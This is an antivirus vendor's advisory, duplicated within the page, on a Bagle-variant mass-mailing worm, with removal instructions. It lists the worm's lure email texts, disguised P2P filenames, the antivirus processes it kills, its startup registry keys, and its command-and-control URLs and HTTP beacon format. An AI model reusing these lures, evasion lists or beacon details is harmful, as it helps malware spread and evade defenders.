McAfee > Theat Center > Virus Detail Page

Overview

This is a virus detection. Viruses are programs that self-replicate recursively, meaning that infected systems spread the virus to other systems, which then propagate the virus further. While many viruses contain a destructive payload, it's quite common for viruses to do nothing more than spread from one system to another.

Characteristics

This is a mass-mailing worm with the following characteristics:

• contains its own SMTP engine to construct outgoing messages
• harvests email addresses from the victim machine
• the From: address of messages is spoofed
• attachment can be a password-protected zip file, with the password included in the message body. Note: detection for the password protected ZIP is included within the 4330 DAT file.
• contains a remote access component (notification is sent to hacker)
• copies itself to folders that have the phrase shar in the name (such as common peer-to-peer applications; KaZaa, Bearshare, Limewire, etc)

Messages are constructed as follows:

From : (address is spoofed)
Subject :

• ^_^ meay-meay!
• ^_^ mew-mew (-:
• Aline
• Anna
• Audra
• Bad girl
• Barbi
• beautiful
• Caitie
• caroline
• ello! =))
• Fotograf
• Gallery photos
• groom
• Hey, dude, it's me ^_^ :P
• Hey, ya! =))
• Hi! :-)
• Hokki =)
• Jammie
• Juli
• Julie
• kate
• Katrina
• Kelley
• kleopatra
• Lisa
• Mandy
• Mary
• Mary-Anne
• My beautiful person
• My Name is Frenk
• My photoalbum
• My photos
• Myphotos
• Photoalbum
• rebecca
• Rena
• Sara
• stacy
• Tammy
• Wau... beautiful (-:
• Weah, hello! :-)
• Weeeeee! ;)))

Body (one of the following):

• Argh, i don't like the plaintext :)
• Fell free to chat with me I accept all ages. Don''''t worry I don''''t bite........hope to hear from you soon!
• If you are going to make me cry, at least be there to wipe away the tears *Right now the worst thing for you to tell me that I can find someone better than you, especially when you are all I want
• You don’t know what you’ve got till it’s gone *You hurt me more than I deserve, how can you be so cruel? I love you more than you deserve, how can I be such a fool?
• I sit with elders of a gentle race, whose world is seldom seen.Who sit and talk of days for which they wait, when all will be revealed. These are song lyrics.
• I'm a social butterfly and a natural flirt. Very hard to get my complete attention. Very open and will answer almost anything. But please don't piss me off. I can be sweet and cuddly or a whatever mood I am in that day so everyday
• Love the outdoors, literature, writing, and athletics
• When The Trust is Gone So Is The Love That Fades Like the Rain Washing Away All The Sorrows Of Yesterday Why I Ask Myself Must It End Like This Tomorrow, I Tell Myself, I'll Be Okay For Now, I'll Just Live In The Memories Of Our Life Together
• I enjoy clean conversations but am open to conversing with women and men with little ones as well. I am very open-minded. All authorization requests will be denied if I don't receive messages and get to know you first.
• I love camping, dirt track racing, going for walks, and I have 2 cats - HotRod and Deebo (named from the movie 'Friday' and he lives up to it!). Life is ever changing, never always easy...
• i love to chat to just about anyone!!
• If I'm online, it problably means I'm pretty bored....so feel free to message me and say hi or whatever else comes to mind at the moment.
• Hey people whats goin on? If there is anything you want to know about me ask me... I am pretty easygoing I won't bite....not at first anywayz hahaa.....one thing I will say on here tho I am not into the Cyber thing so don't even ask.....Ciao...
• Hi! My name is Shreya and I am a goof off!!! So, If you love the outdoors, travelling, books, music, movies, laffing, teasing and/or can poke fun at yourself... please come a hollerin'!!
• I love to dance, read poetry, make people laugh, and hug as many people a day as i can.
• Single Mom of 3, Full time college student, Graduate in December with an Associates of Applied Science in Computer Information Systems Love the internet.
• My hobbies include crochet, sewing, painting lead figures and playing AD&D. Favorite activities include fishing and camping. I love cats, unicorns(go figure), and fantasy in general.
• I like to be in a company of smart, delicate, and with a good sense of humor people. I am Bulgarian, currently getting my Master's in International Business in USA. Favorite actor: Michael Dudikoff
• i'm tall and skiny I'm studying in Pharm. D program in FL. i like music, movie, dancing, sports, SCUBA diving, traveling and make a lot friends.
• Nice friends, nice men, nice sex and feeling great. I don't mind the odd bout of cybersex as I love to use my imagination when I masterbate.
• Hey, guys! by the way, I have no problems with my sexual life, so it's absolutly useless try to have icq sex or things like that. Thanks
• I'm an open minded person and enjoy chatting w/ other people. I'm free and willing to chat about anything. So feel free to Imed me if you wanna chat.
• I love meeting new people and making new friends. I am a Mary Kay Beauty Consultant. I am married to a wonderful man. We have no children, exept for a minature schnauzer that thinks he is a child. Looking forward to meeting you.
• I am from Taiwan but I study in Camden, New Jersey now. I like to know people from different places .
• I'm married and I stay at home. And I don't do cyber sex so leave me the f**k alone
• Looking forward for a response :P

If the attachment is a password protected zip, one of the following lines will be included in the body:

• archive password: %password%
• password: %password%
• pass: %password%

Attachment (may have .exe, .scr, or .zip extension):

• Aline
• Anna
• Audra
• Bad girl
• Barbi
• Caitie
• caroline
• Gallery
• It_I
• Jammie
• Juli
• Julie
• kate
• Katrina
• Katrina
• Kelley
• kleopatra
• Lisa
• Mandy
• Mary
• Mary-Anne
• myfotos
• Photoalbum
• Photomontage
• Picture
• rebecca
• Rena
• Sara
• stacy
• Tammy

The worm uses the following icon, to make it appear that the file is a folder.

Like its predecessors, this worm checks the system date. If it is the 25th March 2005 or later, the worm simply exits and does not propagate.

The virus copies itself into the Windows System directory as i1ru54n4.exe, for example:

C:\WINNT\SYSTEM32\i1ru54n4.exe

It also creates other files in this directory to perform its functions:

• go54o.exe (24,064 bytes) - DLL to perform mailing
• ii5nj4.exe (1,536 bytes) - DLL loader
• i1ru54n4.exeopen (~16KB) - file to be sent via email

The following Registry key is added to hook system startup:

• HKEY_CURRENT_USER\Software\Microsoft\Windows\
  CurrentVersion\Run "rate.exe" = C:\WINNT\SYSTEM32\i1ru74n4.exe

Additionally, the following Registry key is added:

• HKEY_CURRENT_USER\Software\winword "frun"

A mutex called "imain_mutex" is created to ensure only one instance of the worm is running at a time.

This worm attempts to terminate the process of security programs with the the following filenames:

• ATUPDATER.EXE
• ATUPDATER.EXE
• AUPDATE.EXE
• AUTODOWN.EXE
• AUTOTRACE.EXE
• AUTOUPDATE.EXE
• AVLTMAIN.EXE
• AVPUPD.EXE
• AVWUPD32.EXE
• AVXQUAR.EXE
• CFIAUDIT.EXE
• DRWEBUPW.EXE
• ICSSUPPNT.EXE
• ICSUPP95.EXE
• LUALL.EXE
• MCUPDATE.EXE
• NUPGRADE.EXE
• NUPGRADE.EXE
• OUTPOST.EXE
• UPDATE.EXE

Symptoms

• Port 2745 (TCP) open on the victim machine
• Outgoing messages matching the described characteristics
• Files/Registry keys as described

Method of Infection

Mail Propagation

This virus constructs messages using its own SMTP engine. Target email addresses are harvested from files with the following extensions on the victim machine:

• .adb
• .asp
• .cfg
• .dbx
• .eml
• .htm
• .mdx
• .mmf
• .nch
• .ods
• .php
• .pl
• .sht
• .tbb
• .txt
• .wab
• .xml

The virus spoofs the sender address by using a harvested address in the From: field.

The virus avoids sending itself to addresses containing the following:

• @avp.
• @hotmail.com
• @microsoft
• @msn.com
• local
• noreply
• postmaster@
• root@

Remote Access Component

The virus listens on TCP port 2745 for remote connections. It attempts to notify the author that the infected system is ready to accept commands, by contacting various websites, calling a PHP script on the remote sites. At the time of this writing this script is inaccessible. The websites are contacted every 27.8 hours.

http://postertog.de/scr.php
http://www.gfotxt.net/scr.php
http://www.maiklibis.de/scr.php

The format of the HTTP packets sent to the above websites is :-

GET /scr.php?p=2745 HTTP/1.1
User_Agent: beagle2_proclivity
Host: postertog.de

Note: The value of the Host field will change depending on which website is being contacted

Peer To Peer Propagation

Files are created in folders that contain the phrase shar :

• ACDSee 9.exe
• Adobe Photoshop 9 full.exe
• Ahead Nero 7.exe
• Matrix 3 Revolution English Subtitles.exe
• Microsoft Office 2003 Crack, Working!.exe
• Microsoft Office XP working Crack, Keygen.exe
• Microsoft Windows XP, WinXP Crack, working Keygen.exe
• Opera 8 New!.exe
• Porno pics arhive, xxx.exe
• Porno Screensaver.scr
• Porno, sex, oral, anal cool, awesome!!.exe
• Serials.txt.exe
• WinAmp 5 Pro Keygen Crack Update.exe
• WinAmp 6 New!.exe
• Windown Longhorn Beta Leak.exe
• Windows Sourcecode update.doc.exe
• XXX hardcore images.exe

Removal

All Users :
Use specified engine and DAT files for detection and removal.

Additional Windows ME/XP removal considerations

Manual Removal Instructions
To remove this virus "by hand", follow these steps:

1. Reboot the system into Safe Mode (hit the F8 key as soon as the Starting Windows text is displayed, choose Safe Mode.
2. Delete the file following from your WINDOWS System directory (typically C:\Windows\System or C:\Winnt\System32)
   go54o.exe
   i1ru54n4.exe     
   ii5nj4.exe
   i1ru54n4.exeopen
3. Edit the registry
   • Delete the "rate.exe" value from
     • HKEY_CURRENT_USER\Software\Microsoft\
       Windows\CurrentVersion\Run
   • Delete the key
     • HKEY_CURRENT_USER\Software\winword
4. Reboot the system into Default Mode

Sniffer Customers: Filters have been developed that will look for Bagle traffic [Sniffer Distributed 4.1/4.2/4.3, Sniffer Portable 4.7/4.7.5, and Netasyst].

• W32_Bagle.f@MM Sniffer Filters.zip

Variants

Variants

N/A

All Information

Overview -

This is a virus detection. Viruses are programs that self-replicate recursively, meaning that infected systems spread the virus to other systems, which then propagate the virus further. While many viruses contain a destructive payload, it's quite common for viruses to do nothing more than spread from one system to another.

Characteristics

Characteristics -

This is a mass-mailing worm with the following characteristics:

• contains its own SMTP engine to construct outgoing messages
• harvests email addresses from the victim machine
• the From: address of messages is spoofed
• attachment can be a password-protected zip file, with the password included in the message body. Note: detection for the password protected ZIP is included within the 4330 DAT file.
• contains a remote access component (notification is sent to hacker)
• copies itself to folders that have the phrase shar in the name (such as common peer-to-peer applications; KaZaa, Bearshare, Limewire, etc)

Messages are constructed as follows:

From : (address is spoofed)
Subject :

• ^_^ meay-meay!
• ^_^ mew-mew (-:
• Aline
• Anna
• Audra
• Bad girl
• Barbi
• beautiful
• Caitie
• caroline
• ello! =))
• Fotograf
• Gallery photos
• groom
• Hey, dude, it's me ^_^ :P
• Hey, ya! =))
• Hi! :-)
• Hokki =)
• Jammie
• Juli
• Julie
• kate
• Katrina
• Kelley
• kleopatra
• Lisa
• Mandy
• Mary
• Mary-Anne
• My beautiful person
• My Name is Frenk
• My photoalbum
• My photos
• Myphotos
• Photoalbum
• rebecca
• Rena
• Sara
• stacy
• Tammy
• Wau... beautiful (-:
• Weah, hello! :-)
• Weeeeee! ;)))

Body (one of the following):

• Argh, i don't like the plaintext :)
• Fell free to chat with me I accept all ages. Don''''t worry I don''''t bite........hope to hear from you soon!
• If you are going to make me cry, at least be there to wipe away the tears *Right now the worst thing for you to tell me that I can find someone better than you, especially when you are all I want
• You don’t know what you’ve got till it’s gone *You hurt me more than I deserve, how can you be so cruel? I love you more than you deserve, how can I be such a fool?
• I sit with elders of a gentle race, whose world is seldom seen.Who sit and talk of days for which they wait, when all will be revealed. These are song lyrics.
• I'm a social butterfly and a natural flirt. Very hard to get my complete attention. Very open and will answer almost anything. But please don't piss me off. I can be sweet and cuddly or a whatever mood I am in that day so everyday
• Love the outdoors, literature, writing, and athletics
• When The Trust is Gone So Is The Love That Fades Like the Rain Washing Away All The Sorrows Of Yesterday Why I Ask Myself Must It End Like This Tomorrow, I Tell Myself, I'll Be Okay For Now, I'll Just Live In The Memories Of Our Life Together
• I enjoy clean conversations but am open to conversing with women and men with little ones as well. I am very open-minded. All authorization requests will be denied if I don't receive messages and get to know you first.
• I love camping, dirt track racing, going for walks, and I have 2 cats - HotRod and Deebo (named from the movie 'Friday' and he lives up to it!). Life is ever changing, never always easy...
• i love to chat to just about anyone!!
• If I'm online, it problably means I'm pretty bored....so feel free to message me and say hi or whatever else comes to mind at the moment.
• Hey people whats goin on? If there is anything you want to know about me ask me... I am pretty easygoing I won't bite....not at first anywayz hahaa.....one thing I will say on here tho I am not into the Cyber thing so don't even ask.....Ciao...
• Hi! My name is Shreya and I am a goof off!!! So, If you love the outdoors, travelling, books, music, movies, laffing, teasing and/or can poke fun at yourself... please come a hollerin'!!
• I love to dance, read poetry, make people laugh, and hug as many people a day as i can.
• Single Mom of 3, Full time college student, Graduate in December with an Associates of Applied Science in Computer Information Systems Love the internet.
• My hobbies include crochet, sewing, painting lead figures and playing AD&D. Favorite activities include fishing and camping. I love cats, unicorns(go figure), and fantasy in general.
• I like to be in a company of smart, delicate, and with a good sense of humor people. I am Bulgarian, currently getting my Master's in International Business in USA. Favorite actor: Michael Dudikoff
• i'm tall and skiny I'm studying in Pharm. D program in FL. i like music, movie, dancing, sports, SCUBA diving, traveling and make a lot friends.
• Nice friends, nice men, nice sex and feeling great. I don't mind the odd bout of cybersex as I love to use my imagination when I masterbate.
• Hey, guys! by the way, I have no problems with my sexual life, so it's absolutly useless try to have icq sex or things like that. Thanks
• I'm an open minded person and enjoy chatting w/ other people. I'm free and willing to chat about anything. So feel free to Imed me if you wanna chat.
• I love meeting new people and making new friends. I am a Mary Kay Beauty Consultant. I am married to a wonderful man. We have no children, exept for a minature schnauzer that thinks he is a child. Looking forward to meeting you.
• I am from Taiwan but I study in Camden, New Jersey now. I like to know people from different places .
• I'm married and I stay at home. And I don't do cyber sex so leave me the f**k alone
• Looking forward for a response :P

If the attachment is a password protected zip, one of the following lines will be included in the body:

• archive password: %password%
• password: %password%
• pass: %password%

Attachment (may have .exe, .scr, or .zip extension):

• Aline
• Anna
• Audra
• Bad girl
• Barbi
• Caitie
• caroline
• Gallery
• It_I
• Jammie
• Juli
• Julie
• kate
• Katrina
• Katrina
• Kelley
• kleopatra
• Lisa
• Mandy
• Mary
• Mary-Anne
• myfotos
• Photoalbum
• Photomontage
• Picture
• rebecca
• Rena
• Sara
• stacy
• Tammy

The worm uses the following icon, to make it appear that the file is a folder.

Like its predecessors, this worm checks the system date. If it is the 25th March 2005 or later, the worm simply exits and does not propagate.

The virus copies itself into the Windows System directory as i1ru54n4.exe, for example:

C:\WINNT\SYSTEM32\i1ru54n4.exe

It also creates other files in this directory to perform its functions:

• go54o.exe (24,064 bytes) - DLL to perform mailing
• ii5nj4.exe (1,536 bytes) - DLL loader
• i1ru54n4.exeopen (~16KB) - file to be sent via email

The following Registry key is added to hook system startup:

• HKEY_CURRENT_USER\Software\Microsoft\Windows\
  CurrentVersion\Run "rate.exe" = C:\WINNT\SYSTEM32\i1ru74n4.exe

Additionally, the following Registry key is added:

• HKEY_CURRENT_USER\Software\winword "frun"

A mutex called "imain_mutex" is created to ensure only one instance of the worm is running at a time.

This worm attempts to terminate the process of security programs with the the following filenames:

• ATUPDATER.EXE
• ATUPDATER.EXE
• AUPDATE.EXE
• AUTODOWN.EXE
• AUTOTRACE.EXE
• AUTOUPDATE.EXE
• AVLTMAIN.EXE
• AVPUPD.EXE
• AVWUPD32.EXE
• AVXQUAR.EXE
• CFIAUDIT.EXE
• DRWEBUPW.EXE
• ICSSUPPNT.EXE
• ICSUPP95.EXE
• LUALL.EXE
• MCUPDATE.EXE
• NUPGRADE.EXE
• NUPGRADE.EXE
• OUTPOST.EXE
• UPDATE.EXE

Symptoms

Symptoms -

• Port 2745 (TCP) open on the victim machine
• Outgoing messages matching the described characteristics
• Files/Registry keys as described

Method of Infection

Method of Infection -

Mail Propagation

This virus constructs messages using its own SMTP engine. Target email addresses are harvested from files with the following extensions on the victim machine:

• .adb
• .asp
• .cfg
• .dbx
• .eml
• .htm
• .mdx
• .mmf
• .nch
• .ods
• .php
• .pl
• .sht
• .tbb
• .txt
• .wab
• .xml

The virus spoofs the sender address by using a harvested address in the From: field.

The virus avoids sending itself to addresses containing the following:

• @avp.
• @hotmail.com
• @microsoft
• @msn.com
• local
• noreply
• postmaster@
• root@

Remote Access Component

The virus listens on TCP port 2745 for remote connections. It attempts to notify the author that the infected system is ready to accept commands, by contacting various websites, calling a PHP script on the remote sites. At the time of this writing this script is inaccessible. The websites are contacted every 27.8 hours.

http://postertog.de/scr.php
http://www.gfotxt.net/scr.php
http://www.maiklibis.de/scr.php

The format of the HTTP packets sent to the above websites is :-

GET /scr.php?p=2745 HTTP/1.1
User_Agent: beagle2_proclivity
Host: postertog.de

Note: The value of the Host field will change depending on which website is being contacted

Peer To Peer Propagation

Files are created in folders that contain the phrase shar :

• ACDSee 9.exe
• Adobe Photoshop 9 full.exe
• Ahead Nero 7.exe
• Matrix 3 Revolution English Subtitles.exe
• Microsoft Office 2003 Crack, Working!.exe
• Microsoft Office XP working Crack, Keygen.exe
• Microsoft Windows XP, WinXP Crack, working Keygen.exe
• Opera 8 New!.exe
• Porno pics arhive, xxx.exe
• Porno Screensaver.scr
• Porno, sex, oral, anal cool, awesome!!.exe
• Serials.txt.exe
• WinAmp 5 Pro Keygen Crack Update.exe
• WinAmp 6 New!.exe
• Windown Longhorn Beta Leak.exe
• Windows Sourcecode update.doc.exe
• XXX hardcore images.exe

Removal -

Removal -

All Users :
Use specified engine and DAT files for detection and removal.

Additional Windows ME/XP removal considerations

Manual Removal Instructions
To remove this virus "by hand", follow these steps:

1. Reboot the system into Safe Mode (hit the F8 key as soon as the Starting Windows text is displayed, choose Safe Mode.
2. Delete the file following from your WINDOWS System directory (typically C:\Windows\System or C:\Winnt\System32)
   go54o.exe
   i1ru54n4.exe     
   ii5nj4.exe
   i1ru54n4.exeopen
3. Edit the registry
   • Delete the "rate.exe" value from
     • HKEY_CURRENT_USER\Software\Microsoft\
       Windows\CurrentVersion\Run
   • Delete the key
     • HKEY_CURRENT_USER\Software\winword
4. Reboot the system into Default Mode

Sniffer Customers: Filters have been developed that will look for Bagle traffic [Sniffer Distributed 4.1/4.2/4.3, Sniffer Portable 4.7/4.7.5, and Netasyst].

• W32_Bagle.f@MM Sniffer Filters.zip

Variants

Variants -

N/A